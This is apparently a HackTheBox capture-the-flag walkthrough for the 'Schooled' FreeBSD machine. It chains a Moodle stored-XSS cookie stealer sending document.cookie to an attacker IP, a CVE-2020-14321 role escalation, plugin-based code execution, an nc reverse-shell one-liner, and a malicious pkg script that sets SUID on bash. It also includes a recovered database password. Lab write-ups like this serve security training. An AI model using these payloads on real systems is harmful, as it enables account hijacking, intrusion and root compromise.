11 KiB
HackTheBox-Schooled
Rustscan
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
| ssh-hostkey:
| 2048 1d:69:83:78:fc:91:f8:19:c8:75:a7:1e:76:45:05:dc (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGY8PnQ2GFk9RrUQ82xGivlyXZ8k99JFZAFlNqJIftRHSGWL3HsfaO08lnGCrqVxj3235k0L74SJAqWfJs1ykTRipcZpsI5QvwYPyqpisMgH
/SdCH1wehZpgaXRwdn52ob9+GxZ6qjqIon0cH0XR1hkNIGdbTt4RRMy+IfynzVuomW2mUi0tnnXU69pcyYNMShND4PqxVDKZHwUyeDIiYVBvnL5P9qEh0Q/t0HKWFHQ8otwWEpL3jnn774RFP9ET
tZsJ/xosuhty02yIZuP6vqtbWfVqcqM8v1R3jm/xjXfXxiflGO09KO2aePAbEhNEofb7V/f33dRQDv5mr9ceZ1
| 256 e9:b2:d2:23:9d:cf:0e:63:e0:6d:b9:b1:a6:86:93:38 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHc4TgrG+CyKqaIsk10XmAhUKULXK6Bq3bHHeJiWuBmdGS1k3Fp60OoVFdDKQj9aihkaUmbJ8f
kG6dp07bm8IcM=
| 256 7f:51:88:f7:3c:dd:77:5e:ba:25:4d:4c:09:25:ea:1f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPWIP8gV7SGQNoODfYq9qg1k3j6ZZg+1L9zIU9FrHPaf
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
33060/tcp open mysqlx? syn-ack ttl 63
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, SSLSessionReq, TLSSessionReq, X11Probe:
| Invalid message"
| HY000
| LDAPBindReq:
| *Parse error unserializing protobuf message"
|_ HY000
PORT 80 (HTTP)
At the bottom we see a domain name so let's add this to /etc/hosts file
I did not find anything intersting on port 80 also directory fuzzing was failing so we have a domain name let's look for subdomain
Here we need to hide repsone with 461 lines
We found a subdomain moodle.schooled.htb
Names found from subdomain
Jamie Borham
Lianne Carter
Jane Higgins
Manuel Phillips
Other than that nothing was interesting so let's register an account
It throws a lot of erros so let's fix this.
We can only enroll in maths course
Also we can see the teacher's profile
Checking forum activity we see that there's an announcement made by the teacher
Set the MoodleNet profile
Now we can see that Teacher is online
Here we can check for XSS
So appearntly I was doing it wrong and trying the xss session hijacking here as we were the only one who were triggering the file. The announcment had a message
This is a self enrollment course. For students who wish to attend my lectures be sure that you have your MoodleNet profile set.
Students who do not set their MoodleNet profiles will be removed from the course before the course is due to start and I will be checking all students who are enrolled on this course.
So instead of injecting xss on chat , let's try on where we set moodle net profile also I used this xss cookie stelaer
https://github.com/s0wr0b1ndef/WebHacking101/blob/master/xss-reflected-steal-cookie.md
<img src=x onerror="this.src='http://10.10.14.81:8888/?'+document.cookie; this.removeAttribute('onerror');">
Now run the cookie stealer python script
At first you'll see your own cookie but after sometime that script will be accessed by teacher's account and you'll get his session cookie , so copy the session cookie and replace it with your current session cookie
After becoming the teacher , I saw an option to switch roles
On moodle's there are a bunch of reported vulnerabilities so I went reading about each one seemed intersting to me
And PoC was available on github
https://github.com/HoangKien1020/CVE-2020-14321
So here enroll click on enrolling the user and intercept the request with burp then send it to repeater
We can see that this user's id is 24 so we edit the request by enrolling the teaacher him self in the course and making him the manager by assigning role to 1
Now click on the other account who also has become manager and click on login as
At the bottom you'll see Site Administration
There's a problem we can't upload any vulnerable plugin so we would need to modify manager role's permissions , go to users --> define role then click on edit manager role and go to bottom intercept save changes request
You'll see this , send it to repeater tab
Replace this all with the permissions seen on PoC 's repository
Now we can upload plugin
Click on install
You'll see this screen , don't click on continue instead trigger the remote code execution
Now to get a reverse shell I tried the netcat ,bash ones but they didn't worked as this was a Free BSD box so this one worked
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i |nc <ip> <port> > /tmp/f
I tried to acess user's home directory but we didn't had any permissions to view it so next in my mind came about database as moodle was storing usernames so by default websites are hosted in /usr/local/www on FreeBSD
In documentation it said that database configuration is in config.php , so after using the find command
So mysql is running on port 3306 but since it's not a stabilized shell we can't login so we can upload chisel binary on the machine and forward port 3306
$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'moodle';
$CFG->dbpass = 'PlaybookMaster2020';
$CFG->prefix = 'mdl_';
Now we can't use mysql binary as it is not in PATH variable
So there's directory /usr/local
There's a binary folder which means that must be the location where all binaries i.e python,perl,bash,mysql exists so we can use python to spawn a tty shell then use mysql
Python3 exists in /usr/local/bin so spawn and stabilize the shell
We can Jamie's data there and he's a user on the box
It's a bcrypt hash ,save it in a file and crack it with either hashcat or john
SSH into the machine
Doing sudo -l we can see that this user can install any package
Reading the configuration file for pkg
It grabs from devops.htb which points to a private IP
But it wasn't anything we could do so , searched for freebsd custom packages and found this article
http://lastsummer.de/creating-custom-packages-on-freebsd/
Which explained how you can build your own packages, so bascially what this script is doing that creating a folder in james' home directory named stage and a +PRE_DEINSTALL , +POST_INSTALL and +MANIFEST file .
The article says that
You want to run post-install and pre-deinstall tasks as it makes sure your files are in place when you do the system manipulation
So let's modify the script from article and make put a command that will make bash a SUID in +POST_INSTALL
#!/bin/sh
STAGEDIR=~/stage
rm -rf ${STAGEDIR}
mkdir -p ${STAGEDIR}
cat >> ${STAGEDIR}/+PRE_DEINSTALL <<EOF
# careful here, this may clobber your system
echo "Resetting root shell"
pw usermod -n root -s /bin/sh
EOF
cat >> ${STAGEDIR}/+POST_INSTALL <<EOF
# careful here, this may clobber your system
echo "Registering root shell"
chmod +s /usr/local/bin/bash
EOF
cat >> ${STAGEDIR}/+MANIFEST <<EOF
name: mypackage
version: "1.0_5"
origin: sysutils/mypackage
comment: "automates stuff"
desc: "automates tasks which can also be undone later"
maintainer: john@doe.it
www: https://doe.it
prefix: /
EOF
mkdir -p ${STAGEDIR}/usr/local/etc
echo "# hello world" > ${STAGEDIR}/usr/local/etc/my.conf
echo "/usr/local/etc/my.conf" > ${STAGEDIR}/plist
pkg create -m ${STAGEDIR}/ -r ${STAGEDIR}/ -p ${STAGEDIR}/plist -o .
Here's what these shell scripts will do
So after running the above script we will have a FreeBSD package compiled
As we have sudo rights to install any package , install it with --no-repo-update
And we can bash having a SUID so if we do bash -p we will get root
